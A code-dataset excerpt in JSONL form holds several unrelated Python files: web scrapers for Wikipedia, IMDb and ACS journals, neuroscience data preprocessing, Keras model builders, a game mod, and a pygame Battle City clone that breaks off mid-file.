unrecognised command\n else:\n # send back an 'unknown command' message\n txt(mud, id, \"Commande inconnue: '{}'\".format(command))\n show_prompt(mud, id)\n","sub_path":"simplemud.py","file_name":"simplemud.py","file_ext":"py","file_size_in_byte":9725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"255142046","text":"import pickle\nimport os\nimport sys\nimport numpy as np\nimport copy\nfrom bayesdend.utils.data_util import traces_noise_process\nfrom scipy.cluster.hierarchy import linkage, fcluster\nimport pandas as pd\n\n\ndef data_prep(input_file):\n \"\"\"\n Data preprocessing\n :return:\n \"\"\"\n dendrite = pd.read_pickle(input_file)\n\n if 'hasSoma' in dendrite:\n if dendrite['hasSoma']:\n if 'cellIndexAll' in dendrite:\n soma_index = np.asarray(dendrite['cellIndexAll'])\n else:\n soma_index = np.asarray(dendrite['cellIndex'])\n else:\n soma_index = []\n else:\n soma_index = np.asarray(dendrite['cellIndex'])\n\n Masks = dendrite['Masks']\n spine_index = np.asarray(Masks[Masks.MaskType == 'Spine'].index)\n dend_index = np.asarray(Masks[Masks.MaskType == 'Dendrite'].index)\n dend_index = np.setdiff1d(dend_index,soma_index)\n\n inc_index = dendrite['includeIndex'].nonzero()[0]\n spine_index = np.intersect1d(spine_index, inc_index)\n dend_index = np.intersect1d(dend_index, inc_index)\n\n noise_series = dendrite['TCNoise'][inc_index,:]\n signal_series = dendrite['TCdiv'][inc_index,:]\n\n pathLengthGrid = copy.deepcopy(dendrite['pathLengthGrid'])\n pathLengthGrid = pathLengthGrid[dend_index,:]\n pathLengthGrid = pathLengthGrid[:,dend_index]\n nClust = 5\n Z = linkage(pathLengthGrid, method='complete')\n groups = fcluster(Z, nClust, criterion='maxclust')\n\n noiseEst = copy.deepcopy(noise_series)\n noiseEst[np.isnan(noiseEst)] = 1\n noiseEst = np.median(noiseEst,axis=1)\n\n maskPerClust = 2\n select_dend_index = []\n for i in np.unique(groups):\n idx = (groups==i).nonzero()[0]\n if len(idx)>maskPerClust:\n sortIdx = np.argsort(noiseEst[idx])\n select_dend_index.append(dend_index[idx[sortIdx[:maskPerClust]]])\n else:\n select_dend_index.append(dend_index[idx])\n select_dend_index = np.hstack(select_dend_index)\n unselect_dend_index = np.setdiff1d(dend_index,select_dend_index)\n dend_index = np.hstack([select_dend_index,unselect_dend_index])\n\n total_length = np.size(soma_index) + np.size(dend_index) + np.size(spine_index)\n assert total_length == noise_series.shape[0] == signal_series.shape[0]\n\n spine_sig = signal_series[spine_index]\n spine_noi = noise_series[spine_index]\n\n soma_sig = signal_series[soma_index]\n soma_noi = noise_series[soma_index]\n\n dend_sig = signal_series[dend_index]\n dend_noi = noise_series[dend_index]\n\n soma_proc, soma_noi_proc, soma_mask_proc = traces_noise_process(soma_sig, soma_noi)\n dend_proc, dend_noi_proc, dend_mask_proc = traces_noise_process(dend_sig, dend_noi)\n spine_proc, spine_noi_proc, spine_mask_proc = traces_noise_process(spine_sig, spine_noi)\n\n # use all the traces now\n trace = np.concatenate((soma_proc, dend_proc, spine_proc), axis=1)\n noise = np.concatenate((soma_noi_proc, dend_noi_proc, spine_noi_proc), axis=1)\n mask = np.concatenate((soma_mask_proc, dend_mask_proc, spine_mask_proc), axis=1)\n\n data = {'traces': trace,\n 'n_soma': soma_proc.shape[1],\n 'n_dend': dend_proc.shape[1],\n 'n_spine': spine_proc.shape[1],\n 'noises': noise,\n 'masks': mask,\n 'n_select_dend': len(select_dend_index),\n 'dend_index': dend_index}\n\n assert trace.shape == noise.shape == mask.shape\n\n return data\n","sub_path":"bayesdend/data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"271168018","text":"import numpy as np\nimport os\nfrom mpl_toolkits.mplot3d import axes3d\nfrom matplotlib import cm\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nimport matplotlib\nmatplotlib.rcParams.update({'font.size': 16})\nmatplotlib.rcParams['savefig.dpi'] = 300\n\n\nlabels = np.linspace(-1, 1, 1000)\n\nroot = r'G:\\Python\\libs\\binarynet\\data'\n\ndef get_data(name):\n w = np.loadtxt(\n os.path.join(root, 'weights_{}.csv'.format(name)), delimiter=',')\n w = (w.T / np.sum(w, axis=1)).T * 100\n stat = np.loadtxt(\n os.path.join(root, 'stats_{}.csv'.format(name)), delimiter=',')\n return w[:26], stat[:26]\n\nw_det, s_det = get_data('determ')\nw_stoch, s_stoch = get_data('stoch')\nw_none, s_none = get_data('none')\n\nfig = plt.figure()\nplt.plot(s_none[:, 0], 100 - 100 * s_none[:, 3], 'r', label='Train none')\nplt.plot(s_none[:, 0], 100 - 100 *s_none[:, 5], 'r--', label='Test none')\n\nplt.plot(s_det[:, 0], 100 - 100 *s_det[:, 3], 'g', label='Train Deterministic')\nplt.plot(s_det[:, 0], 100 - 100 *s_det[:, 5], 'g--', label='Test Deterministic')\n\nplt.plot(s_stoch[:, 0], 100 - 100 *s_stoch[:, 3], 'b', label='Train Stochastic')\nplt.plot(s_stoch[:, 0], 100 - 100 *s_stoch[:, 5], 'b--', label='Test Stochastic')\n\nplt.xlabel('Epoch')\nplt.ylabel('Error %')\nplt.legend()\nplt.tight_layout()\nfig.show()\n\n\nfig = plt.figure()\nplt.plot(labels, w_none[-1], 'r', label='none')\nplt.plot(labels, w_det[-1], 'g', label='Deterministic')\nplt.plot(labels, w_stoch[-1], 'b', label='Stochastic')\nplt.xlabel('Weight Bin')\nplt.ylabel('Percent %')\nplt.legend()\nplt.tight_layout()\nfig.show()\n\n\nmax_ = max(max(np.max(w_stoch), np.max(w_none)), np.max(w_det))\nfor x, z, label in [\n (s_none, w_none, 'none'), (s_det, w_det, 'Deterministic'),\n (s_stoch, w_stoch, 'Stochastic')]:\n my_dpi = 96\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n\n X = x[:, 0][:, np.newaxis].repeat(len(labels), axis=1)\n Y = labels.T[np.newaxis, :].repeat(len(x[:, np.newaxis]), axis=0)\n\n surf = ax.plot_surface(\n X, Y, z, cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\n\n plt.xlabel('Epoch', linespacing=6.2)\n plt.ylabel('Weight Bin', linespacing=6.2)\n plt.title(label)\n ax.set_zlabel('Percent %', linespacing=6.2)\n ax.yaxis.labelpad = 13\n ax.xaxis.labelpad = 13\n ax.zaxis.labelpad = 13\n ax.set_zlim(0, max_)\n plt.tight_layout()\n fig.show()\nplt.show()\n","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"62035096","text":"import unrealsdk\nfrom unrealsdk import *\n\nfrom . import bl2tools\n\n\nclass Sliding(unrealsdk.BL2MOD):\n Name = \"Sliding\"\n Description = \"Sliding in BL2.\"\n Author = \"Juso\"\n\n def __init__(self):\n self.slide_duration = 2.0\n self.slide_speed = 2.2\n self.old_z = 0\n self.b_update = False\n\n def handle_move(self, caller, function, params):\n pc = bl2tools.get_player_controller()\n slope_delta = pc.Pawn.Location.Z - self.old_z\n\n if slope_delta / params.DeltaTime > 2.0:\n self.slide_duration -= (params.DeltaTime * 1.3)\n\n elif slope_delta / params.DeltaTime < -2.0: # down\n self.slide_duration -= (params.DeltaTime / 2)\n\n else:\n self.slide_duration -= params.DeltaTime\n\n if pc.bDuck == 1 and self.slide_duration > 0.:\n\n pc.Rotation.Roll = 700\n pc.Pawn.CrouchedPct = 2.1\n self.slide_duration -= params.DeltaTime\n\n\n elif pc.bDuck != 1 or self.slide_duration <= 0.:\n pc.Rotation.Roll = 0\n pc.Pawn.CrouchedPct = 0.42\n\n self.old_z = pc.Pawn.Location.Z\n\n def handle_duck(self, caller, function, params):\n pc = bl2tools.get_player_controller()\n self.old_z = pc.Pawn.Location.Z\n if pc.bInSprintState:\n self.slide_duration = 2.0\n if pc.bCrouchToggle:\n if caller.bHoldDuck:\n self.b_update = True\n caller.bHoldDuck = False\n pc.bDuck = 0\n return False\n else:\n self.b_update = True\n caller.bHoldDuck = True\n pc.bDuck = 1\n return False\n else:\n self.b_update = True\n pc.bDuck = 1\n return False\n else:\n return True\n\n def Enable(self):\n def DoSlide(caller: unrealsdk.UObject, function: unrealsdk.UFunction, params: unrealsdk.FStruct) -> bool:\n # self.handle_duck(caller, function, params)\n return True\n\n def AdvancedMove(caller: unrealsdk.UObject, function: unrealsdk.UFunction, params: unrealsdk.FStruct) -> bool:\n # self.handle_move(caller, function, params)\n Log(\"Ayy\")\n\n return True\n\n unrealsdk.RegisterHook(\"WillowGame.WillowPlayerInput.DuckPressed\", \"SlideHook\", DoSlide)\n unrealsdk.RegisterHook(\"Engine.PlayerController.PCServerMoveInner\", \"MoveHook\", AdvancedMove)\n\n def Disable(self):\n unrealsdk.RemoveHook(\"WillowGame.WillowPlayerInput.DuckPressed\", \"SlideHook\")\n unrealsdk.RemoveHook(\"Engine.PlayerController.PCServerMoveInner\", \"MoveHook\")\n\n\nunrealsdk.RegisterMod(Sliding())\n","sub_path":"Sliding/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"250947380","text":"import re\nfrom collections import defaultdict\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_population_data():\n # make the request\n page = requests.get('https://en.wikipedia.org/wiki/List_of_United_States_cities_by_population')\n\n # make the soup parsing object\n soup = BeautifulSoup(page.content, 'html.parser')\n\n # select with table with population data\n population_table = soup.select_one('#mw-content-text > div > table:nth-child(18) > tbody')\n\n data = defaultdict()\n\n for row in population_table.select('tr'):\n # skip heading\n if row.th:\n continue\n\n # put all the cells in a list\n row_cells = [cell for cell in row.select('td')]\n\n # replace '[]' followed by '\\n' (literal) or '\\n' (literal)\n city = re.sub('(\\[\\w\\]\\\\n)|\\\\n', '', row_cells[1].text)\n\n # replace any , or whitespace. with global and multiline flag\n census_2010_population = int(re.sub(',|\\s', '', row_cells[4].text, flags=re.MULTILINE | re.DOTALL))\n\n data[city] = census_2010_population\n\n return data\n","sub_path":"findrcity/data_collection/population_scraper.py","file_name":"population_scraper.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"499647456","text":"import scrapy\n\nfrom imdbsurfer_scrapy import items\n\n\nclass MoviesSpider(scrapy.Spider):\n genres = ['action', 'adventure', 'animation', 'biography', 'comedy', 'crime', 'documentary', 'drama', 'family',\n 'fantasy', 'film_noir', 'game_show', 'history',\n 'horror', 'music', 'musical', 'mystery', 'news', 'reality_tv', 'romance', 'sci_fi', 'sport', 'talk_show',\n 'thriller', 'war', 'western']\n # 'tv_episode', 'short', 'video', 'tvshort', 'game'\n types = ['feature', 'tv_movie', 'tv_series', 'tv_special', 'mini_series', 'documentary']\n name = \"movies\"\n url = 'http://www.imdb.com/search/title?count=100&genres={0}&num_votes=1000,&title_type={1}&sort=user_rating,desc&page={2}'\n start_urls = []\n for genre in genres:\n for type in types:\n for i in range(1, 9):\n start_urls.append(url.format(genre, type, i))\n\n def parse(self, response):\n for i in response.css('div[class=\"lister-item mode-advanced\"]'):\n item = items.Movie()\n item['url'] = response.url\n item['index'] = i.css('div[class=\"lister-item-content\"]').css('h3[class=\"lister-item-header\"]').css(\n 'span[class=\"lister-item-index unbold text-primary\"]::text').extract()\n item['year'] = i.css('div[class=\"lister-item-content\"]').css('h3[class=\"lister-item-header\"]').css(\n 'span[class=\"lister-item-year text-muted unbold\"]::text').extract()\n item['link'] = i.css('div[class=\"lister-item-content\"]').css('h3[class=\"lister-item-header\"]').css(\n 'a::attr(href)').extract()\n item['name'] = i.css('div[class=\"lister-item-content\"]').css('h3[class=\"lister-item-header\"]').css(\n 'a::text').extract()\n item['genres'] = i.css('div[class=\"lister-item-content\"]').css('p[class=\"text-muted \"]').css(\n 'span[class=\"genre\"]::text').extract()\n item['minutes'] = i.css('div[class=\"lister-item-content\"]').css('p[class=\"text-muted \"]').css(\n 'span[class=\"runtime\"]::text').extract()\n item['rate'] = i.css('div[class=\"lister-item-content\"]').css('div[class=\"ratings-bar\"]').css(\n 'div[class=\"inline-block ratings-imdb-rating\"]').css('strong::text').extract()\n item['metascore'] = i.css('div[class=\"lister-item-content\"]').css('div[class=\"ratings-bar\"]').css(\n 'div[class=\"inline-block ratings-metascore\"]').css('span[class=\"metascore favorable\"]::text').extract()\n item['artistsa'] = i.css('div[class=\"lister-item-content\"]').css('p[class=\"\"]').css('a::text').extract()\n item['artistsb'] = i.css('div[class=\"lister-item-content\"]').css('p[class=\"\"]::text').extract()\n item['votes'] = i.css('div[class=\"lister-item-content\"]').css('p[class=\"sort-num_votes-visible\"]').css(\n 'span::text').extract()\n yield item\n","sub_path":"imdbsurfer_scrapy/spiders/MoviesSpider.py","file_name":"MoviesSpider.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"389492319","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport random,time\r\nfrom compare_url_title import compare_url_title\r\n\r\n\r\n\r\ndef get_content(url):\r\n headers = {\r\n \"referer\": url,\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4098.3 Safari/537.36\"}\r\n try_number = 0\r\n while try_number < 10:\r\n try:\r\n content = requests.get(url, headers=headers, timeout=120)\r\n content.encoding = \"utf-8\"\r\n # print(content.text)\r\n time.sleep(random.randint(0, 5))\r\n return content.text\r\n except requests.exceptions.RequestException:\r\n try_number += 1\r\n content = []\r\n print(\"time out\")\r\n if content == []:\r\n content = requests.get('https://www.google.com/')\r\n\r\n return content.text\r\n\r\n\r\ndef get_page(url):\r\n content = get_content(url)\r\n #print(content)\r\n soup = BeautifulSoup(content, 'html.parser')\r\n each_paper_url = soup.findAll(\"div\", {'class': \"parent-item\"})\r\n #print(each_paper_url[0])\r\n pattern1 = r'.*(.*).*'\r\n pattern3 = r'<.*?>'\r\n paper_url_list = []\r\n paper_title_list = []\r\n for paper in each_paper_url:\r\n # print(paper)\r\n #paper_url_list.append(\"https://pubs.acs.org/\"+str(paper_url.replace('full', 'abs')))\r\n paper_url_list.append(\"https://pubs.acs.org\" + str(str(re.findall(pattern1, str(paper))).replace(\"[\", \"\").replace(\"]\", \"\").replace(\"'\", \"\")))\r\n paper_title_list.append((re.sub(pattern3, \"\", str(re.findall(pattern2, str(paper))), count=0)).replace(\"['\", \"\").replace(\"']\", \"\").replace(\"'\", \"\"))\r\n #print(paper_url_list)\r\n #print(len(paper_url_list))\r\n #print(paper_title_list)\r\n #print(len(paper_title_list))\r\n return paper_url_list, paper_title_list\r\n\r\n\r\ndef get_abstract(url):\r\n content = get_content(url)\r\n soup = BeautifulSoup(content, 'html.parser')\r\n\r\n each_paper_url = soup.findAll(\"p\", {'class': \"articleBody_abstractText\"})\r\n #print(each_paper_url)\r\n pattern1 = r'.*

(.*)

.*'\r\n pattern2 = r'<.*?>'\r\n latest_issue_inf = re.sub(pattern2, '', str(re.findall(pattern1, str(each_paper_url))), count=0).replace(\"['\", \"\")\r\n #print(latest_issue_inf)\r\n return str(latest_issue_inf)\r\n\r\n\r\ndef spider_ACS_JPCA(ISS):\r\n url = (\"https://pubs.acs.org/loi/jpcafh\")\r\n [latest_issue, latest_issue_url] = get_page(url)\r\n print(latest_issue_url)\r\n print(latest_issue)\r\n if latest_issue == ISS:\r\n url_list = []\r\n url_list.append(str(latest_issue_url))\r\n print(url_list)\r\n else:\r\n url_list = []\r\n url_list.append(str(latest_issue_url))\r\n pattern1 = r'\\d+'\r\n iss = re.findall(pattern1, str(ISS))\r\n url_list.append(\"https://pubs.acs.org/toc/jpcafh/\" + str(int(iss[0])) + \"/\" +str(int(iss[1])))\r\n print(url_list)\r\n paper_url_list = []\r\n paper_title_list = []\r\n for url in url_list:\r\n [paper_url, paper_title] = get_latest_issue_inf(url)\r\n for paper_url_1 in paper_url:\r\n paper_url_list.append(paper_url_1)\r\n for paper_title_1 in paper_title:\r\n paper_title_list.append(paper_title_1)\r\n print(len(paper_url_list))\r\n [paper_url_list, paper_title_list] = compare_url_title(paper_url_list, paper_title_list, \"data\\\\ACS_JPCA.csv\", \"data\\\\Temp\\\\ACS_JPCA.csv\")\r\n print(len(paper_url_list))\r\n if len(paper_url_list) > 0:\r\n paper_abstract_list = [\"a\" for _x in range(len(paper_url_list))]\r\n for i in range(0, len(paper_url_list)):\r\n print(paper_url_list[i])\r\n paper_abstract_list[i] = get_abstract(paper_url_list[i])\r\n # print(paper_abstract_list[i])\r\n return paper_title_list, paper_url_list, paper_abstract_list, latest_issue\r\n else:\r\n paper_title_list = []\r\n paper_url_list = []\r\n paper_abstract_list = []\r\n return paper_title_list, paper_url_list, paper_abstract_list, latest_issue\r\n\r\n\r\n\r\n\r\n#ISS = 'Vol. 125, Iss. 21'\r\n#[paper_title_list, paper_url_list, paper_abstract_list, latest_issue] = spider_ACS_JPCA(ISS)\r\n#print(paper_title_list)\r\n#print(paper_url_list)\r\n#print(paper_abstract_list)\r\n#print(len(paper_abstract_list))","sub_path":"spider_ACS_JPCA.py","file_name":"spider_ACS_JPCA.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"220772883","text":"from tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Flatten, Dropout, LSTM\nfrom tensorflow.keras import optimizers\n\nfrom sklearn.ensemble import RandomForestClassifier\n\n\ndef get_cnn_model(n_rows, n_cols, num_classes, num_filters=128, kernel_size=2, \n pool_window_size=2, dropout_ratio=0.2, num_neurons_fcl1=128, num_neurons_fcl2=128, init='uniform'):\n \"\"\"Get CNN Keras model used for evaluations.\n\n Author: Jernej Vivod (vivod.jernej@gmail.com)\n\n Args:\n n_rows (int): number of rows in a data segment.\n n_cols (int): number of columns in a data segment.\n num_classes (int): number of different classes in the dataset.\n num_filters (int): number of filters.\n kernel_size (int): kernel size.\n pool_window_size (int): pooling window size.\n dropout_ratio (float): dropout ratio.\n num_neurons_fcl1 (int): number of neurons in the first dense layer.\n num_neurons_fcl2 (int): number of neurons in the second dense layer.\n init (str): kernel initialization method.\n\n Returns:\n (object): initialized and compiled model.\n \"\"\"\n\n # Set model.\n model = Sequential()\n \n # Set model topology.\n model.add(Conv2D(num_filters, (kernel_size, kernel_size), input_shape=(n_rows, n_cols, 1), activation='relu'))\n model.add(MaxPooling2D(pool_size=(pool_window_size, pool_window_size), padding='valid'))\n model.add(Dropout(dropout_ratio))\n model.add(Flatten())\n model.add(Dense(num_neurons_fcl1, activation='relu'))\n model.add(Dense(num_neurons_fcl2, activation='relu'))\n model.add(Dense(num_classes, activation='softmax'))\n adam = optimizers.Adam(lr = 0.001, decay=1e-6)\n model.compile(loss='categorical_crossentropy', optimizer=adam, metrics=['accuracy'])\n return model\n\n\ndef get_lstm_model(n_rows, n_cols, num_classes, dropout_ratio=0.2, num_neurons_lstm1=128, \n num_neurons_lstm2=128):\n \"\"\"Get LSTM Keras model used for evaluations.\n\n Author: Jernej Vivod (vivod.jernej@gmail.com)\n\n Args:\n n_rows (int): number of rows in a data segment.\n n_cols (int): number of columns in a data segment.\n num_classes (int): number of different classes in the dataset.\n num_filters (int): number of filters.\n kernel_size (int): kernel size.\n pool_window_size (int): pooling window size.\n dropout_ratio (float): dropout ratio.\n num_neurons_lstm1 (int): number of neurons in the first LSTM layer.\n num_neurons_lstm2 (int): number of neurons in the second LSTM layer.\n\n Returns:\n (object): initialized and compiled model.\n \"\"\"\n\n # Set model.\n model = Sequential()\n\n # Set model topology.\n model.add(CuDNNLSTM(num_neurons_lstm1, input_shape = (n_rows, n_cols), return_sequences = True))\n # model.add(LSTM(num_neurons_lstm1, input_shape = (n_rows, n_cols), return_sequences = True))\n model.add(Dropout(dropout_ratio))\n # model.add(LSTM(num_neurons_lstm2)) \n model.add(CuDNNLSTM(num_neurons_lstm2)) \n\n\n model.add(Dense(num_classes, activation = 'sigmoid'))\n model.compile(loss = 'binary_crossentropy', optimizer = 'rmsprop', metrics = ['accuracy'])\n return model\n\n\ndef get_rf_model(n_estimators=100, n_jobs=1):\n \"\"\"Get Random Forest Scikit-Learn model used as the baseline in the evaluation.\n\n Author: Jernej Vivod (vivod.jernej@gmail.com)\n\n Args:\n n_estimators (int): number of estimators to use.\n n_jobs (int): number of jobs to run in parallel.\n\n Returns:\n (object): initialized model.\n \"\"\"\n\n # Initialize model\n model = RandomForestClassifier(n_estimators=n_estimators)\n return model\n\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"365124410","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def isBalanced(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: bool\n \"\"\"\n def treeDep(node):\n if node is None:return 1\n else:\n return max(treeDep(node.left)+1,treeDep(node.right)+1)\n global rs\n rs = True\n def travel(node):\n global rs\n if node is None:return\n else:\n if abs(treeDep(node.left) - treeDep(node.right)) > 1:\n rs = False\n return False\n else:\n travel(node.left)\n travel(node.right)\n travel(root)\n return rs\n#Runtime: 132 ms","sub_path":"balanced-binary-tree.py","file_name":"balanced-binary-tree.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"594246225","text":"class solution:\n def movezeros(self,nums):\n mark = []\n for i in range(len(nums)):\n if(nums[i]==0):\n mark.append(i)\n nums.append(0)\n while(len(mark)>0):\n nums.pop(mark[-1])\n mark.pop()\n\n\nnums = [0,0,1]\nsolution().movezeros(nums)\nprint(nums)\n","sub_path":"python/movezeros.py","file_name":"movezeros.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"463692049","text":"import math\nimport pygame\nimport random\nimport configparser\n\nVERDE\t= [0,255,0]\nAZUL\t= [0,0,255]\nROJO\t= [255,0,0]\nNEGRO\t= [0,0,0]\nBLANCO = [255,255,255]\n\nANCHO\t= 512\nALTO\t= 448\n\ndef img_matrix(img, posx, posy, tamx = 32, tamy = 32):\t\n\tmatrix = []\n\tfor i in range(0,posx):\n\t\tls_row = []\n\t\tfor j in range(0,posy):\n\t\t\tcuadro = img.subsurface(i*tamx,j*tamy,tamx,tamy)\n\t\t\tls_row.append(cuadro)\n\t\tmatrix.append(ls_row)\n\treturn matrix\n\ndef cut_img(img, i, j, tamx, tamy):\n\tcuadro = img.subsurface(i*32,j*32,tamx,tamy)\n\treturn cuadro\n\ndef mapping(matrix, map, ls_elem, an, al):\n\tfor j in range(len(ls_elem)):\t\n\t\tfor i,e in enumerate(ls_elem[j]):\n\t\t\tscreen.blit(matrix[int(map.get(e,'col'))][int(map.get(e,'fil'))], [i*an, j*al])\n\ndef intro():\n\tfor x in range(3):\n\t\tscreen.blit(matrix[16 + x][6], [elem.rect.x, elem.rect.y])\n\n\nclass gamer(pygame.sprite.Sprite):\n\n\tdef __init__(self, matrix, pos_ini):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.m = matrix\n\t\tself.col = 0\n\t\tself.level = 0\n\t\tself.dir = 0\n\t\tself.image = self.m[self.col][self.level]\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.x = pos_ini[0]\n\t\tself.rect.y = pos_ini[1]\n\t\tself.movement = pygame.mixer.Sound('gamer_move_sound.wav')\n\t\tself.shot = pygame.mixer.Sound('sound_gamer_shot.wav')\n\t\tself.velx = 0\n\t\tself.vely = 0\n\t\tself.ups = 3\n\t\tself.score = 0\n\n\tdef update(self):\n\t\tif self.dir == 0:\n\t\t\tself.col = 0\n\t\telif self.dir == 1:\n\t\t\tself.col = 2\n\t\tif self.dir == 2:\n\t\t\tself.col = 4\n\t\telif self.dir == 3:\n\t\t\tself.col = 6\n\t\tself.rect.x += self.velx\n\t\tself.rect.y += self.vely\n\t\tself.image = self.m[self.col][self.level]\n\nclass enemy(pygame.sprite.Sprite):\n\n\tdef __init__(self, matrix, pos_ini):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.m = matrix\n\t\tself.col = 16\n\t\tself.level = 6\n\t\tself.dir = 2\n\t\tself.image = self.m[self.col][self.level]\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.x = pos_ini[0]\n\t\tself.rect.y = pos_ini[1]\n\t\tself.movement = pygame.mixer.Sound('sound_enemy_move.wav')\n\t\tself.velx = 0\n\t\tself.vely = 0\n\t\tself.borning = True\n\t\tself.cad = 50\n\n\tdef update(self):\n\t\tif self.dir == 0:\n\t\t\tself.col = 0\n\t\telif self.dir == 1:\n\t\t\tself.col = 2\n\t\tif self.dir == 2:\n\t\t\tself.col = 4\n\t\telif self.dir == 3:\n\t\t\tself.col = 6\n\t\tself.rect.x += self.velx\n\t\tself.rect.y += self.vely\n\t\tself.image = self.m[self.col][self.level]\n\t\tself.cad -= 1\n\nclass wall(pygame.sprite.Sprite):\n\n\tdef __init__(self, matrix, pos_ini):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.m = matrix\n\t\tself.row = 0\n\t\tself.col = 0\n\t\tself.image = self.m\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.x = pos_ini[0]\n\t\tself.rect.y = pos_ini[1]\n\n\tdef update(self):\n\t\tself.image = self.m\n\nclass proyectil(pygame.sprite.Sprite):\n\n\tdef __init__(self, matrix, pos_ini):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.m = matrix\n\t\tself.row = 0\n\t\tself.dir = 0\n\t\tself.image = self.m[self.dir][self.row]\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.x = pos_ini[0] \n\t\tself.rect.y = pos_ini[1]\n\t\tself.velx = 0\n\t\tself.vely = 0\n\n\tdef update(self):\n\t\tself.rect.y += self.vely \n\t\tself.rect.x += self.velx \n\nif __name__ == '__main__':\n\tpygame.init()\n\tscreen \t\t= \tpygame.display.set_mode([ANCHO,ALTO])\n\n\t#\tCUSTOMIZE THE IMAGE SPRITES\n\n\tintro_img \t= \tpygame.image.load('battlecity_intro_32pxl.png')\n\timg \t\t= \tpygame.image.load('battlecity_general_32pxl.png')\n\tinterfaz \t= \tpygame.image.load('interfaz_32pxl.png')\n\tblock \t\t= \tcut_img(img,16,0,32,32)\n\ttank\t\t= \tcut_img(img,0,0,208,26)\n\t#brick \t\t= \timg_matrix(block, 2, 4, 16, 8)\n\tdir_proy \t= \tpygame.image.load('img_proy_dir.png')\n\tproys \t\t= \timg_matrix(dir_proy, 4, 1, 8, 8)\n\tmi_imag \t= \timg_matrix(img, 25, 16, 32, 32)\n\tmov_tank\t=\timg_matrix(tank, 8, 1, 26, 26)\n\tmapa \t\t=\tconfigparser.ConfigParser()\n\tmapa.read('battle_mapa.map')\n\tsinfo \t\t=\t'info'\n\tmp \t\t\t= \tmapa.get('info', 'archivo')\n\tls_mp \t\t= \tmp.split('\\n')\n\tp_ini \t\t= \t218\n\tclock \t\t= \tpygame.time.Clock()\n\tintro = True\n\td = ALTO\n\t#pygame.display.flip()\n\twhile intro:\n\t\tif p_ini >= 314:\n\t\t\tp_ini = 218\n\t\tif d > 10:\n\t\t\tfor x in range(ALTO):\n\t\t\t\td = ALTO - x\n\t\t\t\tscreen.blit(intro_img, [0, d])\n\t\t\t\tpygame.display.flip()\n\t\t\tscreen.blit(mov_tank[7][0], [130,p_ini + 32])\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tintro = False\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_DOWN:\n\t\t\t\t\tp_ini = p_ini + 32\n\t\t\t\t\tscreen.blit(intro_img, [0, 0])\n\t\t\t\t\tscreen.blit(mov_tank[7][0], [130,p_ini])\n\t\t\t\t\tprint(p_ini)\n\t\t\t\tif event.key == pygame.K_SPACE:\n\n\t\t\t\t\tif p_ini == 250:\n\t\t\t\t\t\tintro = False\n\t\tpygame.display.flip()\n\n\t\t\n\n\t#\tCUSTOMIZE THE SOUND EFFECTS\n\n\n\t# CREATE GROUP\n\n\tgamers \t\t= \tpygame.sprite.Group()\n\tenemies\t\t=\tpygame.sprite.Group()\n\twalls\t\t= \tpygame.sprite.Group()\n\tproyectiles\t= \tpygame.sprite.Group()\n\tproy_enemy\t= \tpygame.sprite.Group()\n\n\t# CREAT GAMER\n\n\tg \t= \tgamer(mov_tank,[160,190])\n\tgamers.add(g)\n\n\t# CREATE WALLS\n\n\tfor j in range(len(ls_mp)):\t\n\t\tfor i,e in enumerate(ls_mp[j]):\n\t\t\tif e != '.':\n\t\t\t\tw = wall(mi_imag[int(mapa.get(e,'col'))][int(mapa.get(e,'fil'))], [(i*32) + 32, (j*32) + 16])\n\t\t\t\twalls.add(w)\n\n\t# CREATE ENEMIES\n\n\te = enemy(mi_imag,[0,0])\n\te.rect.x = random.randrange(ANCHO)\n\te.rect.y = 16\n\te.velx = 2\n\tenemies.add(e) \n\t\t\t\n\t# CREATE VARIABLES\n\n\t\n\tflag \t= \tTrue\n\tx = 0\n\n\t# INFO GAME\n\n\tfuente = 